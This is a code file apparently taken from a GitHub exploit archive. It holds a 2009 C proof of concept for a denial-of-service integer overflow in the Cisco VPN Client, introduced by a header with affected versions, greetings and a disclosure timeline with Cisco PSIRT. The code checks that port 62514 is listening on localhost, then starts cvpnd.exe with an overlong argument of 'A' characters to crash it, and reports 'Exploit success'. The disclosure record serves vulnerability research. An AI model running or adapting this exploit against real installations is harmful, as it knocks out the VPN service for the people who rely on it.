-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathCVE-2009-4118.txt
217 lines (184 loc) · 6.56 KB
/
CVE-2009-4118.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
/*
Cisco VPN client version 5.0.03.0560
Cisco VPN client Version 5.0.04.0300
Cisco VPN client Version 5.0.05.0290
Cisco VPN client Version 4.8.02.0010
*/
/*
* Cisco VPN Client 0day Integer overflow (DOS) Proof Of Concept Code
*
* By Alex Hernandez aka alt3kx (c) November 2009
*
* This POC is only for test. If an application read a malformed chars
* file like this POC, the application will be crashed.
*
* We tested this code on:
*
* Windows Vista Bussines SP1 Spanish
* Windows Vista Home Premium SP1 English
* Windows 2000 Server English
* Windows XP Professional SP3
*
* Cisco VPN client version 5.0.03.0560
* Cisco VPN client Version 5.0.04.0300
* Cisco VPN client Version 5.0.05.0290
* Cisco VPN client Version 4.8.02.0010
*
* Compiled on VC++ win32
*
* Friends:
* sirdarckcat, nitr0us, hkm, crypkey, xDAWN, canit0, chr1x
*
* TT & DSRT
* daSh, p4r4n01ds, darkslaker, beto, motis.
*
* Very special credits to:
*
* str0ke (milw0rm.com)
* rathaus (securiteam.com)
* FX (Phenoelit.de)
* dSR! (segfault.es)
* 0dd (0dd.com)
*
*
* PH-Neutral 0x7d9, We hope to see u there intruders
*
* ---------------
* Report Timeline
* ---------------
* 06/03/2009 The vulnerability was discovered.
* 07/03/2009 Exploit/PoC code was developed (private).
* 09/03/2009 Cisco PSIRT was notified about the issue.
* 11/03/2009 Vendor response asking for details of the testing environment.
* 12/03/2009 Test scenario explained and sent a PDF document with details.
* 16/03/2009 Developers/PSIRT confirmed the vulnerability.
* 19/03/2009 New test scenarios around new versions (CISCO VPN client).
* 23/03/2009 CISCO PSIRT assing an internal tracking PSIRT-0676131279.
* 23/03/2009 CISCO PSIRT assing an Bug ID-CSCsz49276.
* 15/04/2009 New Advisory release (private).
* 16/04/2009 New PSIRT feedback no ETA avaiable.
* 23/04/2009 The development team working the fix.
* 01/05/2009 The development team estimated one month to fix.
* 01/06/2009 New PSIRT feedback, no ETA available.
* 29/06/2009 The development team estimated one month to fix.
* 28/07/2009 The development team working on maitenance release.
* 28/07/2009 The development team estimated one month to fix.
* 02/09/2009 New vulnerabilities found on CISCO VPN client.
* 02/09/2009 The development team can not publish the new version 5.0.6.
* 02/09/2009 The development team working on maitenance release.
* 02/09/2009 The development team estimated one month to fix.
* 10/09/2009 The BETA program should be finished by the end of Oct
* and the client posted next month.
* 07/10/2009 The development team estimated one month to fix.
* 11/11/2009 New PSIRT feedback RNA avaiable.
* 19/11/2009 The vulnerability goes public and PSIRT is informed.
* 19/11/2009 Fix and details will available on CISCO Intellishield Alert & Bug Tool kit.
*
* CISCO Fix and Details:
*
* BugToolKit:
* http://tools.cisco.com/Support/BugToolKit/search/getBugDetails.do?method=fetchBugDetails&bugId=CSCsz49276
*
* Intellishield Alert:
* http://tools.cisco.com/security/center/viewAlert.x?alertId=19445
*
*/
#include <windows.h>
#include <winsock.h>
#include <stdio.h>
#pragma comment ( lib, "ws2_32.lib" )
int CheckPortUDP( short int nPort )
{
struct sockaddr_in nSockServer;
WSADATA wsaData;
int lBusy = 0;
int nSocket;
/* Initialization */
if( WSAStartup( 0x0101, &wsaData ) == 0 )
{
/* Create Socket */
nSockServer.sin_family = AF_INET;
nSockServer.sin_port = htons( nPort );
nSockServer.sin_addr.s_addr = inet_addr( "127.0.0.1" );
/* Check UDP Protocol */
nSocket = socket( AF_INET, SOCK_DGRAM, 0 );
lBusy = ( bind( nSocket, (SOCKADDR FAR *) &nSockServer,
sizeof( SOCKADDR_IN ) ) == SOCKET_ERROR );
/* Close Socket if Busy */
if( lBusy )
closesocket( nSocket );
/* Close Winsock */
WSACleanup();
}
/* Return */
return( lBusy );
}
int CheckPortTCP( short int nPort )
{
struct sockaddr_in nSockServer;
WSADATA wsaData;
int lBusy = 0;
int nSocket;
/* Initialization */
if( WSAStartup( 0x0101, &wsaData ) == 0 )
{
/* Create Socket */
nSockServer.sin_family = AF_INET;
nSockServer.sin_port = htons( nPort );
nSockServer.sin_addr.s_addr = inet_addr( "127.0.0.1" );
/* Check TCP Protocol */
nSocket = socket( AF_INET, SOCK_STREAM, 0 );
lBusy = ( connect( nSocket, (struct sockaddr *) &nSockServer,
sizeof( nSockServer ) ) == 0 );
/* Close Socket if Busy */
if( lBusy )
closesocket( nSocket );
/* Close Winsock */
WSACleanup();
}
/* Return */
return( lBusy );
}
int main(void)
{
char szPath[] = "C:\\Program Files\\Cisco Systems\\VPN Client\\cvpnd.exe";
//uncomment this line for Windows XP Spanish versions
//char szPath[] = "C:\\Archivos de programa\\Cisco Systems\\VPN Client\\cvpnd.exe";
char buffer[] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
PROCESS_INFORMATION pif;
STARTUPINFO si;
ZeroMemory(&si,sizeof(si));
si.cb = sizeof(si);
BOOL bRet = CreateProcess(
szPath,
buffer,
NULL,
NULL,
FALSE,
0,
NULL,
NULL,
&si,
&pif);
system("cls");
printf("\n .:: Cisco VPN Client 0day Integer overflow (DoS) Proof Of Concept Code ::.\n");
printf(" .:: By Alex Hernandez aka alt3kx (c) November 2009 .::\n\n");
/* Check for TCP Port */
if( CheckPortTCP(62514) )
printf("[+] Cisco VPN Client TCP port listening\t[OK!]\n");
else
printf("[+] Cisco VPN Client TCP Port isn't Busy\t[Wrong!]\n");
/* Check for UDP Port */
if( CheckPortUDP(62514) )
printf("[+] Cisco VPN Client UDP port listening\t[OK!]\n");
else
printf("[+] Cisco VPN Client UDP Port isn't Busy\t[Wrong!]\n");
if(bRet == FALSE){MessageBox(HWND_DESKTOP,"Unable to start program check the default PATH Cisco VPN Client cvpnd.exe\n","",MB_OK);
return 1;}
else if (bRet == TRUE){MessageBox(HWND_DESKTOP,"Attempting exploit Cisco VPN DoS exploit...","",MB_OK);
printf("\n[+] Few seconds to crash the program...\n");
printf("[+] Exploit success...\n\n");
return 1;}
CloseHandle(pif.hProcess);
CloseHandle(pif.hThread);
}